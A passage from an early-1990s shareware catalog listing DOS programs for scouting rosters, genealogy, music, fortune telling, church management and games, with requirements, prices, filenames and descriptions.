and training data. Produces Cub Scout and Scouter rosters, a + roster of Former Members, 3 type of mailing labels, an indi- + vidual record, Pack attendance summary, and an HONORS listing + for your next Pack Meeting. + + Product: SHIP TRACKER + Needs: IBM PC, DOS 2.0 or better. 256k RAM. + Author: Robert Barrentine, 301-490-7104 + Registration: $35.00 + Version: 1.0 (01-15-92) + User benefits: Mail support, limited phone support. + Look for: availability unknown on BBSs; SHTRAK.ZIP in OUTDOORS + forum LIB 2 on CompuServe. + Download size: 216k + Description: + Stores Ship's roster, advancment data, participation data, + Ship's offices served, meetings attended, and all training + data. Generates Scout and Scouter rosters, roster of former + Ship's members, 3 types of mailing labels, an individual + records for each member, and an attendance summary for all + Scouts. + + Product: TRAINING TRACKER [***] + Needs: IBM PC, DOS 2.0 or better. 256k RAM. + Author: Robert Barrentine, 301-490-7104 + Registration: $35.00 + Version: 1.2 (03-22-92) + User benefits: Mail support, limited phone support. + Look for: TNGTRK.ZIP on BBSs; TRTRAK.ZIP in OUTDOORS forum LIB 2 + on CompuServe. + Download size: 226k + Special instructions: Product distribution restricted to the + United States. + Description: + Upon input of all unit data, all unit rosters, and the logging + of all Training Attendance Reports submitted to a Training + Chair, program will generate District Scouter rosters (Trained + and Untrained), a roster of former district Scouters with their + training status, 3 types of mailing labels, an individual + training records for each Scouter, a District Training Summary, + + Chapter 15, "Home & hobby" 344 + + + + Unit Inventory of Training for each unit, a District Summary of + Trained Leaders, and a Training Status of Top Leaders report. + + Product: TROOP TRACKER + Needs: IBM PC, DOS 2.0 or better. 256k RAM. + Author: Robert Barrentine, 301-490-7104 + Registration: $35.00 + Version: 2.1 (12-15-91) + User benefits: Mail support, limited phone support. + Look for: TRTRAK.ZIP on BBSs; TRTRAK.ZIP in OUTDOORS forum LIB 2 + on CompuServe. + Download size: 243k + Description: + A menu-driven program which stores roster, advancement, + attendance, participation, Troop/Patrol offices, Merit Badges + earned, and training data. Produces Scout and Scouter rosters, + roster of Former Members, 3 type of mailing labels, an indi- + vidual record, an evaluation of advancement eligibility, an + evaluation of OA eligibility, Troop attendance summary, and an + HONORS listing for your next CoH. + + + 15.12 Genealogy + + Product: Brother's Keeper + Needs: IBM PC, DOS 3.1 or better. 512k RAM, hard disk. + Author: John Steed + Registration: $45.00 + Version: 5.0 (01-01-92) + User benefits: Printed manual; master disks; support. + Look for: BK5*.* (multiple files) on BBSs (call 616-364-1127 to + download it at no charge); BK5*.* in ROOTS forum LIB 3 + (multiple files) on CompuServe; BK5*.* in GENEALOGY RTC LIB 8 + (multiple files) on GEnie. + Download size: 990k + Description: + This featured genealogy program can store names, dates, + locations, and other information for up to 1,000,000 people. It + prints all the standard charts and reports and a few unique + ones. Reports include ancestor or pedigree charts, descendant + reports with relationships, graphic descendant tree, family + group sheets, alphabetical name lists, birthday lists, custom + designed reports, ahnentafel lists, graphic box charts, and a + descendant register report. Includes gedcom. + + Product: CHRONOS [***] + Interactive historical timelines. See full description on + page 299. + + Chapter 15, "Home & hobby" 345 + + + + Product: Cumberland Diary [***] + Needs: IBM AT (80286), DOS 3.0 or better. + Author: Cumberland Software, 615-647-4012 + Registration: $16.00 + Version: 1.0 (05-27-91) + User benefits: Printed Manual, master disks, phone support. + Disks of other shareware programs. Spell-Check dictionary. + Look for: CDIARY10.ZIP on BBSs (call 813-471-0552 to download it + at no charge); CDIARY.ZIP in IBMAPPS forum LIB 7 on CompuServe. + Download size: 195k + Description: + Allows entries for multiple diaries or journals. It contains a + cut-and-paste word-processor with pull-down menus and pop-up + screens. Optional secrecy mode with password protection and + data encryption. Select by date or heading. + + Product: Cumberland Story [***] + Needs: IBM PC, DOS 3.0 or better. 640k RAM, hard disk. + Author: Cumberland Software, 615-647-4012 + Registration: $19.00 + Version: 1.0 (05-28-91) + User benefits: Printed Manual, master disks, phone support. + Disks of other shareware programs. Spell-Check Dictionary. + Look for: CSTORY10.ZIP on BBSs (call 813-471-0552 to download it + at no charge); CSTORY.ZIP in ROOTS forum LIB 3 on CompuServe. + Download size: 241k + Description: + Helps you write and print a structured life story book. It + features a cut-and-paste word processor with pull-down menus + and pop-up screens. It contains many ideas and suggestions with + a chapter and topic outliner. + + Product: Cumberland Tree [***] + Needs: IBM AT (80286), DOS 3.0 or better. 640k RAM, hard disk. + Author: Cumberland Software, 615-647-4012 + Registration: $39.50 + Version: 3.2 (11-27-91) + User benefits: Printed manual, master disks, phone support, bonus + utilities. Disks of other shareware programs,. + Look for: CTREE32.ZIP on BBSs (call 813-471-0552 to download it + at no charge); CTREE.ZIP in ROOTS forum LIB 2 on CompuServe. + Download size: 330k + Description: + Allows entry of names, places and dates tying an extended + family together automatically as names are entered. It features + pull-down menus and pop-up screens with on-line help. Surnames + are allowed at the beginning, middle or end of a name. Place + names only need be entered once with selection from a pop-up + screen there-after! Print and view on screen up to 16 different + reports including pedigree charts, family groups, descendants, + statistics and others. GEDCOM compatible. + + Chapter 15, "Home & hobby" 346 + + + + Product: Family Tree Print Utility + Needs: IBM PC, DOS 2.1 or better. 384k RAM. Hard Disk and 640K + RAM recommended. + Author: Common Sense Software, 513-231-0730 + Registration: $25.00 + Version: C (03-01-91) + User benefits: Phone/CIS/Mail support, printed manual, latest + version, newsletter, laser printing service for charts. + Look for: availability unknown on BBSs; FTP*.ZIP in ROOTS forum + LIB 8 on CompuServe. + Download size: 180k + Description: + Prints family history charts using databases created by PAF, + Family Ties or GEDCOM files. FTP prints Three Generation Charts + (like linked Family Group Sheets) and Wall Charts of ancestors, + descendants or all people. An alphabetized index can be printed + for each chart. Supports all printers (including PostScript) + and features an LDS Church-certified GEDCOM export capability + (Fam Ties vers). Includes a "tree pruning" feature to omit + family lines from the charts. Laser printing service available. + + + 15.13 Music + + Product: ACCU Music Printer + Needs: IBM PC, DOS 3.0 or better. Text editor or word processor + needed to enter music. + Author: Kevin Fischer, 619-487-5461 + Registration: $5.00 + Version: 2.1 (03-23-91) + User benefits: Receive next version on disk with printed + documentation; Support for registered/non-registered users; + Other registration plans available. + Look for: AC21MUSC.ZIP on BBSs (call 619-566-1745 to download it + at no charge). + Download size: 100k + Description: + Allows the user to create their own sheet music. Musical notes + are entered via a user supplied text editor. The program then + will print this music out on the printer in traditional sheet + music format. The program supports Treble, Bass, Tenor, Alto, + and Soprano clefs. It has three modes of print quality for + normal printers and one mode for laser printers. A program to + transpose your music is also included. It can transpose by + half steps, change the key signature, etc. + + Product: ALBUM KEEPER II + CD, Album Organizer. See full description on page 318. + + Product: AlbumMaster [***] + Easily catalog your album collection. See full description on + page 318. + + Chapter 15, "Home & hobby" 347 + + + + Product: CassetteMaster + The best way to catalog your cassettes! See full description + on page 319. + + Product: CDMaster + Helping You To *Master Your CD Collection. See full + description on page 320. + + Product: Melissa's Music Flashcards + Needs: IBM PC, DOS 3.3 or better. EGA monitor, Microsoft mouse. + Author: Fischer Grafix & Software + Registration: $20.00 + Version: 2.0 (01-30-92) + User benefits: Master disks, phone support. + Look for: FMSMMF.ZIP on BBSs; FMSMMF.ZIP in IBMAPP forum LIB 11 + on CompuServe. + Download size: 60k + Description: + Kids of all ages can learn to read music. You can set the type + of note that appears on the screen from flats to sharps. The + program will acknowledge if your choice is correct by smiling + at you or if your selection was wrong it will cry. The program + was written to add some fun to the drudgery of trying to learn + music. The program also includes a hint feature which shows the + correct key on the piano keyboard. + + Product: MuziTrak System + Needs: IBM PC, DOS 2.1 or better. Hard disk, 512k RAM. + Author: Blam Entertainment Group, 613-831-4064 + Registration: $20.00 + Version: 1.11 (10-08-91) + User benefits: Serial Number, New Version Notification, Free + Upgrades. + Look for: MT-111.ZIP on BBSs. + Download size: 150k + Description: + Compact Disc Cataloging Program. Easy to use, menu driven. + Search for any song title on any disc. Capable of tracking up + to 99 song titles per disc and their run times. Track artist, + title, recording label, year of release, distributor and + running time. Also presence of CD+Graphics, CD-Video, CD3, + AAD, DDD, etc. Fully configurable printer support for any + printer. Database archive support included. + + Product: ORGANIZE! Jazz Collection [***] + Cataloging system specifically for jazz. See full description + on page 322. + + Product: ORGANIZE! Your CDs & Records [***] + Cataloging system for CDs, LPs and tapes. See full description + on page 324. + + Chapter 15, "Home & hobby" 348 + + + + Product: PIANOMAN + Needs: IBM PC, DOS 2.0 or better. 160k RAM. + Author: Neil J. Rubenking + Registration: $25.00 + Version: 4.01 (02-08-89) + User benefits: Disk with example tunes. + Look for: availability unknown on BBSs; PMAN40.ARC in + ZNT:AFTERHOURS forum LIB 11 on CompuServe. + Download size: 130k + Description: + Turn your PC keyboard into an electronic piano! Play tunes on + the keyboard, then edit easily, with all commands available by + a single keystroke. Record 2-4 voices and merge them to get a + tune with harmony. Compile tunes to stand-alone programs that + now auto-synch themselves with processor speed. Play short + tunes in the background using Cove Software's SPKR.SYS. Many + example tunes available, created by the author and by third + parties. + + Product: SoundZ [***] + The ULTIMATE Music Librarian. See full description on + page 327. + + + 15.14 Fortune telling & astrology + + See also: Religion & philosophy (page 356). + + Product: Book of Changes [***] + Needs: IBM PC, DOS 2.0 or better. 420k RAM. + Author: R.K. West Consulting + Registration: $29.00 + Version: 1.61 (03-01-92) + User benefits: Latest version, printed manual, free mail support, + CIS support, 900-number phone support, upgrade notices. + Look for: BOOK*.ZIP on BBSs; BOOK*.ZIP in IBMNEW forum LIB 6 on + CompuServe. + Download size: 1k + Description: + The I Ching is an ancient Chinese book used for both fortune + telling and philosophical insight. Toss coins or sticks to + create a pattern of 6 lines, forming a hexagram for + interpretation. Completely menu-driven, so you never enter long + command sequences. You can edit the text for each hexagram and + add your own comments. Readings can be saved, edited, printed. + + Chapter 15, "Home & hobby" 349 + + + + Product: By the Numbers [***] + Needs: IBM PC, DOS 2.0 or better. 420k RAM. + Author: R.K. West Consulting + Registration: $29.00 + Version: 4.52 (03-01-92) + User benefits: Latest version, free mail support, CIS support, + 900-number phone support, upgrade notices. + Look for: NUMB*.ZIP on BBSs; NUMB*.ZIP in IBMNEW forum LIB 6 on + CompuServe. + Download size: 1k + Description: + Use the philosophy of Numerology to analyze your name & + birthdate for their symbolic meaning and metaphysical + vibrations, giving a complete personality profile. Uses + Pythagorean system, takes name changes into account, analyzes + 10 personality elements, provides forecast. Readings can be + saved, edited, printed. + + Product: Crystal Ball [***] + Needs: IBM PC, DOS 2.0 or better. 512k RAM. + Author: R.K. West Consulting + Registration: $19.00 + Version: 3.11 (03-01-92) + User benefits: Latest version, printed manual, free mail support, + CIS support, 900-number phone support, newsletter, upgrade + notices. + Look for: CRYS*.ZIP on BBSs; CRYS*.ZIP in IBMNEW forum LIB 8 on + CompuServe. + Download size: 1k + Description: + Welcome to the world of the psychic computer! This tongue-in- + cheek program makes predictions and answers questions with a + sometimes enigmatic style reminiscent of the ancient Greek + oracles. You select the subject matter for predictions of + personal interest. This could explain where those crazy tabloid + headlines come from! + + Product: Fortune Teller [***] + Needs: IBM PC, DOS 2.0 or better. 400K RAM. + Author: R.K. West Consulting + Registration: $29.00 + Version: 3.51 (08-15-91) + User benefits: Latest version, printed manual, free mail support, + CIS support, 900-number phone support, upgrade notices. + Look for: FORT*.ZIP on BBSs; FORT*.ZIP in IBMNEW forum LIB 6 on + CompuServe. + Download size: 1k + Description: + A potpourri of fortune telling techniques includes three + separate playing card methods, dice, short Numerology reading, + and Runes. A history and explanation of each method appears in + the documentation. Also included is an ESP test. + + Chapter 15, "Home & hobby" 350 + + + + Product: Geomancy [***] + Ancient system of divination with black magic. See full + description on page 358. + + Product: Mayan Calendar [***] + Needs: IBM PC, DOS 2.0 or better. 512k RAM. + Author: R.K. West Consulting + Registration: $29.00 + Version: 3.51 (03-01-92) + User benefits: Latest version, free mail support, CIS support, + 900-number phone support, upgrade notices. + Look for: MAYAN*.ZIP on BBSs; MAYA*.ZIP in IBMNEW forum LIB 6 on + CompuServe. + Download size: 1k + Description: + Uses the astronomical knowledge of the ancient Mayans to + convert a modern calendar date to its Mayan equivalent, and + then gives the Mayan astrological interpretation. Also uses + Julian period dates and will calculate from Mayan to modern + date. Has chart of Mayan and Aztec day and month names. Easy- + to-understand documentation and history of the Mayan calendar + included on disk. Norman Donaldson's excellent research is + explained in detail. + + Product: Personal Tarot [***] + Needs: IBM PC, DOS 2.0 or better. 512k RAM. + Author: R.K. West Consulting + Registration: $29.00 + Version: 2.52 (03-01-92) + User benefits: Printed manual, latest version, free mail support, + CIS support, 900-number phone support, upgrade notices. + Look for: TAROT*.ZIP on BBSs; TARO*.ZIP in IBMNEW forum LIB 8 on + CompuServe. + Download size: 1k + Description: + Tarot cards have been used around the world throughout history + for fun and fortune. Now you can enjoy professional quality + Tarot readings on your PC! Personal Tarot automates shuffling + and dealing, builds a 10-card layout, and displays card + descriptions and meanings. You choose from different methods of + shuffling and layout. You can edit card interpretations and add + your own comments. Readings can be saved, edited, printed. No + graphics. + + Chapter 15, "Home & hobby" 351 + + + + Product: Richard Webster Programs [***] + Needs: IBM PC, DOS 2.0 or better. 512k RAM. + Author: R.K. West Consulting + Registration: $29.00 + Version: 2.1 (03-01-92) + User benefits: Latest version, free mail support, CIS support, + 900-number phone support, upgrade notices. + Look for: WEBSTER.ZIP on BBSs; AURA*.ZIP in IBMNEW forum LIB 6 on + CompuServe. + Download size: 1k + Description: + Based on the work and research of internationally-known psychic + entertainer Richard Webster, "Aura Reading" helps you learn + what to look for when attempting to see the human aura. "Quick + Numerology" uses a special method of Numerology, popular in + Australia and New Zealand, to give a quick but pointed + personality profile. It's a great way to meet people and make + friends! + + Product: Your ESP Test [***] + Needs: IBM PC, DOS 2.1 or better. CGA monitor. + Author: R.K. West Consulting + Registration: $0.00 + Version: 1.1 (01-01-92) + User benefits: Free mail support, optional 900# phone support. + Look for: ESP*.ZIP on BBSs; ESP*.ZIP in IBMNEW forum LIB 6 on + CompuServe. + Download size: 1k + Description: + Three standard tests to see if you have ESP (extra-sensory + perception) potential. Try precognition, clairvoyance, or + telekinesis. Lots of fun! + + + 15.15 Planes, trains & automobiles + + Product: Chris's Automobile Recorder [***] + Needs: IBM PC, DOS 3.3 or better. 300k RAM and one disk drive + larger than 360k. Strongly recommended: hard Disk, 80286 + computer, CGA monitor. + Author: Cooney Applied Technology + Registration: $0.00 + Version: 12.2A (03-28-91) + User benefits: Unknown. + Look for: THE ANNEX on BBSs (call 513-274-0821 to download it at + no charge); CAR122.EXE in IBMAPP forum LIB 7 on CompuServe. + Download size: 188k + Description: + Keeps a log of a vehicle's or machine's operation. It + independently tracks when each maintenance item or inspection + is due. Full statistics display. Quick, powerful, & easy to + use, comprehensive, and has pop-up context-sensitive help and a + 28 p. manual. It will help you operate your vehicles or + machines reliably and economically. The detailed, printed log + + Chapter 15, "Home & hobby" 352 + + + + adds value to your vehicle at resale time. "Scan" mode can + remind of any maintenance due when you start your computer. + + + 15.16 Software tools + + 15.16.1 For other + + Product: CROSSWORD POWER + Make crossword puzzles from your words/clues. See full + description on page 382. + + Product: HelpPC Quick Reference Utility + PC Programmer's reference utility. See full description on + page 259. + + + 15.17 Other + + Product: Bannerific + Needs: IBM PC, DOS 2.0 or better. + Author: TexaSoft, 214-291-2115 + Registration: $15.00 + Version: 1.1 (01-01-91) + User benefits: User registration, latest version, bonus programs + included. + Look for: BANNER.ZIP on BBSs; BANNER.ZIP in IBMAPP forum LIB 7 on + CompuServe. + Download size: 80k + Description: + Prints Vertical or Horzontal banners on any printer. + + Product: C.A.R.S. [***] + The Complete Automobile Reporting System. See full description + on page 173. + + Product: Creativity Package [***] + Become more creative. See full description on page 130. + + Product: Home Helper + Various useful routines for the home. See full description on + page 87. + + Chapter 15, "Home & hobby" 353 + + + + Product: ORGANIZE! Your Fabrics [***] + Needs: IBM PC, DOS 3.1 or better. Hard disk recommended. + Author: HomeCraft Software, 503-692-3732 + Registration: $59.95 + Version: 5.27 (03-23-92) + User benefits: Printed manual, quick reference card, master + disks, newsletter support, bonus utilities. + Look for: FABRC527.ZIP on BBSs. + Download size: 300k + Description: + For people who sew this is the program that will help you keep + your fabrics and notions organized. Each fabric can be + organized using up to 21 criteria such as fabric type, color, + pattern, intended use when purchased, amount available and + more. All information you enter can be searched, cross + referenced and alphabetized. This software allows you to + quickly find what you need or to determine that you don't have + what you are looking for. Published by HomeCraft, the leader + in cataloging software. + + Product: ORGANIZE! Your Home [***] + Needs: IBM PC, DOS 3.1 or better. + Author: HomeCraft Software, 503-692-3732 + Registration: $59.95 + Version: 5.27 (03-23-92) + User benefits: Printed manual, quick reference card, updates, + newsletter support, bonus utilities. + Look for: HOME527.ZIP on BBSs. + Download size: 300k + Description: + A home and office inventory system that is great for insurance + records or for just help you keep track of what you own and + where it is located. Each item can be catorgized using up to + 21 lines of information plus a full screen free-form note pad. + A 10,000,000 entry capacity can handle the largest inventory. + + 3-D drop down menus put all of the features at your finger + tips. User definable reports print anything from labels to + full page reports. Search for, cross reference or alphabetize + any line. + + Chapter 15, "Home & hobby" 354 + + + + Product: Peronal Record Keeper + Needs: IBM PC, DOS 3.0 or better. Hard disk and CGA monitor + strongly recommended. + Author: Professional Automated Systems, 609-448-9299 + Registration: $49.75 + Version: 1.1 (09-01-90) + User benefits: Support from authors (other than installation + help); discounts on future versions. + Look for: availability unknown on BBSs; PRK.EXE in IBMAPPS forum + LIB 7 on CompuServe. + Download size: 278k + Special instructions: Product distribution restricted to the + United States. + Description: + Allows you to store information in 14 different categories, + including home inventory, valuables, important documents, + medical data, family dates, entertainment catalog, tax data, + loan information, credit cards, tradespeople, etc. Each + category has an associated report. Full context-sensitive help, + very easy to use. Complete documentation is included on the + distribution diskette. + + Product: Quilt [***] + Create intriguing patterns/scrn saver option. See full + description on page 316. + + Product: STS26 + Space Shuttle Tracker. See full description on page 285. + + Product: UDECIDE [***] + Decision analysis and what-if tool. See full description on + page 197. + + Product: WORLD29 + Global Mapping/tracking Geography. See full description on + page 301. + + Product: Your Numerologist + Needs: IBM PC, DOS 3.0 or better. + Author: Unique Software + Registration: $18.95 + Version: 1.03 (02-13-91) + User benefits: Reduced rate upgrades; notification of major + upgrades; tech support by Fax and/or CompuServe Mail. + Look for: URNMBR.EXE on BBSs; URNMBR.EXE in IBMNEW forum LIB 6 on + CompuServe. + Download size: 78k + Description: + Provides you with a personalize "day at a glance" calendar + providing you with all the numerological data you need for each + day. And there's no need to wander through pages of + documentation, tables of content, and indexes to interpret your + numbers. Each calendar provides you with your + * personal year number + + Chapter 15, "Home & hobby" 355 + + + + * yearly guideline + * personal month number + * guideline for month + * personal day number + * daily focus + + Chapter 16, "Religion & philosophy" 356 + + + + + + Chapter 16 + Religion & philosophy + + See also: Home & hobby, Fortune telling & astrology (page 348). + + + 16.1 The Bible + + 16.1.1 Bible programs + + Product: SeedMaster + Needs: IBM PC, DOS 2.1 or better. Hard disk, 512k RAM. + Author: White Harvest Software, Inc., 919-870-0775 + Registration: $30.00 + Version: 2.1 (11-01-90) + User benefits: Latest program version, notification of updates/ + enhancements, printed manual, BBS and Voice Mail Support. + Look for: SMDEMO.LZH on BBSs (call 919-846-2141 to download it at + no charge). + Download size: 235k + Description: + KJV Bible/Concordance. Copyrighted Bible texts avail from + author (NIV, RSV, Spanish, Greek NT). Up to 3 Bible texts side + by side. Interlinear option. Fast browsing. Bible books + selected by menu. Exhaustive word list. Searches can test word + order and case. * wildcard. Search words highlighted on screen/ + printer. Store and merge searches (OR, AND, XOR, NOT). Search + statistics. Commentary lets you enter comments verse by verse. + Notepad. Grabber copies window text. Uses many CUA windowing + standards. + + 16.1.2 Bible text + + Product: SeedMaster + Bible Study/Concordance Program. See full description on + page 356. + + + 16.2 Software for houses of worship + + See also: Database applications (page 137). + + Chapter 16, "Religion & philosophy" 357 + + + + Product: Church Membership Tracking Sys + Needs: IBM PC, DOS 3.0 or better. Hard Disk. + Author: Torbert Data Systems, INC., 804-488-5506 + Registration: $295.00 + Version: 3.0 (07-06-91) + User benefits: Attractive 3 Ring manual, support BBS, telephone + support. + Look for: TDS BBS on BBSs (call 804-488-4146 to download it at no + charge); CMTS3*.ZIP in IBMAPP forum LIB 9 (multiple files) on + CompuServe; CMTS3*.ZIP in IBMPC RTC LIB 3 (multiple files) on + GEnie. + Download size: 300k + Special instructions: Product distribution restricted to the + United States. + Description: + An exceptionally easy to use, full featured church management + system. Modules for membership, donations, attendance, + visitation and a powerful fund accounting general ledger system + are included. Maintains all membership and financial + information of a church, either large or small. This is also + an excellent program for other non-profit organizations. The + program is well supported by the author and frequently updated. + + Product: ORGANIZE! Your Books/Magazines [***] + Cataloging system for books & magazines. See full description + on page 323. + + Product: ORGANIZE! Your CDs & Records [***] + Cataloging system for CDs, LPs and tapes. See full description + on page 324. + + Product: ProDev*MEMBER + Needs: IBM PC, DOS 2.0 or better. Hard disk. + Author: Pro Dev Software, 616-788-2243 + Registration: $30.00 + Version: 4.09h (05-01-91) + User benefits: One year technical support. + Look for: availability unknown on BBSs; PDMEMB.EXE in IBMAPP + forum LIB 9 on CompuServe. + Download size: 287k + Description: + Tracks address, children, attendance, giving, jobs, talents and + any information for anyone walking in the church door. Allows + fast posting of giving and attendance. Unlimited text notes + window per member with search features. Many reports, + statements, labels and rotary file card runs with very flexible + filtering. F1 Help and very low cost. + + + 16.3 New age/occult + + Product: Book of Changes [***] + I CHING fortunes and philosophy. See full description on + page 348. + + Chapter 16, "Religion & philosophy" 358 + + + + Product: By the Numbers [***] + Personality analysis with Numerology. See full description on + page 348. + + Product: Fortune Teller [***] + 6 ways to tell fortunes, plus ESP test. See full description + on page 349. + + Product: Geomancy [***] + Needs: IBM PC, DOS 2.0 or better. 600k RAM. + Author: R.K. West Consulting + Registration: $29.00 + Version: 4.04 (03-01-92) + User benefits: Latest version, printed manual, free mail support, + CIS support, 900-number phone support, upgrade notices. + Look for: GEO*.ZIP on BBSs; GEO*.ZIP in IBMNEW forum LIB 6 on + CompuServe. + Download size: 1k + Description: + This is an ancient system of divination, sometimes associated + with black magic. Originally based on stones tossed in a + circle, modern Geomancy uses your selection of dot patterns to + create an Astro-Geomantic chart and answer your questions. + Provides an explanation of Geomantic figures. Readings can be + saved, edited, printed. + + Product: Mayan Calendar [***] + Converts Mayan/modern calendar dates. See full description on + page 350. + + Product: Personal Tarot [***] + Fortune telling with Tarot cards. See full description on + page 350. + + Product: Richard Webster Programs [***] + Learn to read auras! See full description on page 350. + + Product: Your ESP Test [***] + Test your ESP potential! See full description on page 351. + + Chapter 16, "Religion & philosophy" 359 + + + + 16.4 Philosophy + + Product: Ethics Awareness [***] + Needs: IBM PC, DOS 3.3 or better. VGA monitor. + Author: Niche Software, 714-892-9052 + Registration: $5.00 + Version: 1.1 (03-21-92) + User benefits: Mail support. + Look for: ETHIK.ZIP on BBSs (call 714-636-2667 to download it at + no charge). + Download size: 260k + Description: + Did you know that a positive ethical perspective of a company + must be continually articulated? As of 1990, 36% of + organizations with more than 100 employyes provide ethics + training. This PC kit might be used to help individuals handle + tough decisions; to nurture a sense of conscience in the + organization; to use the PC as a host for your unique company + code of ethics. This program explains secular incentives for + doing the right thing. + + 16.4.1 Metaphysics + + Product: Book of Changes [***] + I CHING fortunes and philosophy. See full description on + page 348. + + + 16.5 Software tools + + 16.5.1 For other + + Product: CHRONOS [***] + Interactive historical timelines. See full description on + page 299. + + Chapter 17, "Games" 360 + + + + + + Chapter 17 + Games + + See also: Home & hobby, Lottery (page 336). + + + 17.1 Practical jokes + + Product: Curses! [***] + Creative insult generator. See full description on page 361. + + Product: Hard at Work [***] + Needs: IBM PC, DOS 2.0 or better. 420k RAM. + Author: R.K. West Consulting + Registration: $0.00 + Version: 1.1 (06-01-91) + User benefits: Free mail support, 900-number phone support, CIS + support. + Look for: HAWHAW.ZIP on BBSs; HAWHAW.ZIP in IBMNEW forum LIB 6 on + CompuServe. + Download size: 1k + Description: + This cutie ties up your computer with a Very Important (but + imaginary) task so you can take a break. When you start Hard At + Work, it selects one of 7 routines at random. You can pick your + favorite job by pressing the appropriate function key. The + activity on screen looks too important to be interrupted. If + someone tries to stop the action with ESC or CTRL-C, a DANGER + message pops up, and a tone alerts you. The process continues + until you want to stop it. + + Product: LoveDOS [***] + Needs: IBM PC, DOS 2.0 or better. 420k RAM. + Author: R.K. West Consulting + Registration: $0.00 + Version: 1.3 (06-01-91) + User benefits: Free support, 900-number phone support, CIS + support. + Look for: LOVEDOS.ZIP on BBSs; LOVE*.ZIP in IBMNEW forum LIB 6 on + CompuServe. + Download size: 1k + Description: + Unlike practical joke programs that take over the DOS prompt + and insult you, this uncooperative program drowns you with love + and affection! It responds intelligently to many DOS commands + and has a repertoire of friendly comments. + + + 17.2 Jokes & humor + + Product: Babble! + Creativity tool for writers. See full description on page 130. + + Chapter 17, "Games" 361 + + + + Product: Crystal Ball [***] + Humorous computerized psychic. See full description on + page 349. + + + 17.3 Sayings & stories + + Product: Curses! [***] + Needs: IBM PC, DOS 2.1 or better. 512k RAM. + Author: R.K. West Consulting + Registration: $10.00 + Version: 2.11 (03-01-92) + User benefits: Latest version, free mail support, CIS support, + 900-number phone support, upgrade notices. + Look for: CURSE*.ZIP on BBSs; CURS*.ZIP in IBMNEW forum LIB 8 on + CompuServe. + Download size: 1k + Description: + A humorous, creative "insult generator" with a different twist. + A single keystroke switches from insults to compliments! + Phrases are randomly generated from your vivid vocabulary. You + control the contents, so the program can generate descriptive + phrases on any subject. + + Product: FormGen Utility Pak #1 + Super useful DOS utility kit. See full description on page 25. + + + 17.4 Board games + + 17.4.1 Mahjong + + Product: Mah Jongg--Solitaire + Needs: IBM PC, DOS 2.1 or better. EGA or Hercules monitor. + Author: Arcanum Computing + Registration: $15.00 + Version: 3.51 (08-09-91) + User benefits: Master disks, utilities, additional tile sets. + Look for: MAHJNG35.ZIP on BBSs (call 508-875-3618 to download it + at no charge); MAHJ35.ZIP in GAMERS forum LIB 13 on CompuServe. + Download size: 146k + Description: + A highly addictive solitaire game played with colorful Chinese + tiles. The challenge is to remove all the tiles from the + playing surface. It sounds easy to play (and it is), but + winning is always a challenge. The game supports EGA, VGA and + Hercules graphics, mouse or keyboard input. Now also supports + loadable tile sets (one extra set included) as well as an + editor with which players can create their own tiles. + + Chapter 17, "Games" 362 + + + + 17.4.2 Other + + Product: OutFox + Needs: IBM PC, DOS 3.3 or better. + Author: ShareGames, 619-283-0472 + Registration: $10.00 + Version: 2.1 (10-19-90) + User benefits: Latest Version, Free updates for 6 Months, & 24 Hr + Tech Support. + Look for: OUTFOX.ZIP on BBSs (call 619-440-0899 to download it at + no charge). + Download size: 66k + Description: + Try to "Out Fox" the fox in this computerized version of "Fox + and Hounds". Keep the fox at bay so he can't reach safety. The + object is to surround the fox so it can't move. The fences, + trees, hedges, and rocks will help. Look out for the rocks + though. When the fox feels cornered or gets confused, they + move and sometimes plop down on a hound. + + Product: Pallanda + Needs: IBM PC, DOS 3.0 or better. EGA monitor. + Author: ShareGames, 619-283-0472 + Registration: $15.00 + Version: 1.6 (01-27-91) + User benefits: Latest Version, Free updates for 6 Months, & 24 Hr + Tech Support. + Look for: PALLANDA.ZIP on BBSs (call 619-440-0899 to download it + at no charge). + Download size: 124k + Description: + This is a game for the "little people", styled somewhat like + Candy Land with surprise drawings along the way. You must get + to the center by moving to the closest matching color. There's + enough strategy and luck to make it fun for Dad and Mom. Prince + Pallanda can be included as one of the four players. The name + comes from 'Pal Land' where everyone plays happily together and + King Pallanda ensures everyone plays fair. Even youngsters + that aren't reading yet can learn to play well. + + Product: TriAxis + Needs: IBM PC, DOS 3.3 or better. EGA monitor. + Author: ShareGames, 619-283-0472 + Registration: $10.00 + Version: 2.1 (01-10-91) + User benefits: Latest Version, Free updates for 6 Months, & 24 Hr + Tech Support. + Look for: TRIAXIS.ZIP on BBSs (call 619-440-0899 to download it + at no charge). + Download size: 84k + Description: + You are on an island composed of hexagonal bio-zones with + different terrain. Survival in TriAxis depends on how well you + use the environment and control your population. This + + Chapter 17, "Games" 363 + + + + challenging game is for two to six players and the computer can + also play. Game play is a cross between chinese checkers and + regular checkers except smaller populations cannot capture + larger ones. "Harvest" and "Famine" add Mother Nature's whims. + + + 17.5 Arcade games + + Product: AxTrons + Needs: IBM PC, DOS 3.3 or better. + Author: ShareGames, 619-283-0472 + Registration: $10.00 + Version: 1.0 (02-17-90) + User benefits: Latest Version, Free updates for 6 Months, & 24 Hr + Tech Support. + Look for: AXTRONS.ZIP on BBSs (call 619-440-0899 to download it + at no charge). + Download size: 58k + Description: + Eliminate your opponents by setting traps and direct combat + based on your energy level. Try to collect as many of the + power coins thrown by the crowd at the arena as you can. The + ClyAxistrons are good trackers, so stay out of their way - if + you can. There's an extra prize for registered players with + really high scores. + + Product: CleanUp + Needs: IBM PC, DOS 3.3 or better. EGA monitor. + Author: ShareGames, 619-283-0472 + Registration: $10.00 + Version: 2.1 (11-02-90) + User benefits: Latest Version, Free updates for 6 Months, & 24 Hr + Tech Support. + Look for: CLEANUP.ZIP on BBSs (call 619-440-0899 to download it + at no charge). + Download size: 65k + Description: + Clean up the gold stars without hitting a barrier or your own + trail. It takes strategy and skill to avoid blocking your own + path. If you've been a Tandy TRS-80 user, you may recognize + "NIM" at the end of each game. Keeps track of the top ten game + scores and will monitor play time so two players can compete. + Scores are based on how fast and efficiently you can "drive the + little car". The author will send you a free game disk if you + can beat the score mentioned in the DOC file. + + Chapter 17, "Games" 364 + + + + Product: Dueling Dragons + Needs: IBM PC, DOS 3.0 or better. EGA monitor. + Author: ShareGames, 619-283-0472 + Registration: $10.00 + Version: 1.0 (02-02-90) + User benefits: Latest Version, Free updates for 6 Months, & 24 Hr + Tech Support. + Look for: DRAGONS.TXT on BBSs (call 619-440-0899 to download it + at no charge). + Download size: 60k + Description: + Wrap your dragon around the opposing dragon so it can't move + long enough to be declared the winner. You also have to avoid + getting wrapped up in your own tail. You can compete with a + friend or the computer. Scoring 